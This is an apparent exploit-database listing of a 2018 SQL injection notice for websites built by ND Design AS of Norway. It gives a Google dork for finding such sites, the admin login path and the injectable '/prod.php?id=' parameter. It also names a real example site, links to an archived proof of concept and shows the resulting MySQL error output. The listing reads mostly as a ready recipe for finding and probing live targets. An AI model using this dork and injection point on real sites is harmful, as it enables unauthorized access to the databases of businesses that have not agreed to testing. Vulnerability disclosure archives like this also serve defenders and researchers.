ND Design AS Norway SQL Injection Vulnerability

2018.09.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : ND Design AS Norway SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 12/09/2018 # Vendor Homepage : nddesign.no # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''ND Design AS'' site:no # Admin Login Path : /login.php # Exploit : /prod.php?id=[SQL Injection] ################################################################################################# # Example Site => homcare.no/prod.php?id=2349%2 => [ Proof of Concept ] => archive.is/gqr5r # SQL Database Error => SELECT * FROM products WHERE c_id = AND p_ord < ORDER BY p_ord DESC LIMIT 1 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND p_ord < ORDER BY p_ord DESC LIMIT 1' at line 1 SELECT * FROM products WHERE c_id = AND p_ord > ORDER BY p_ord ASC LIMIT 1 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND p_ord > ORDER BY p_ord ASC LIMIT 1' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-nd-design-as-norway-sql-injection-vuln.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top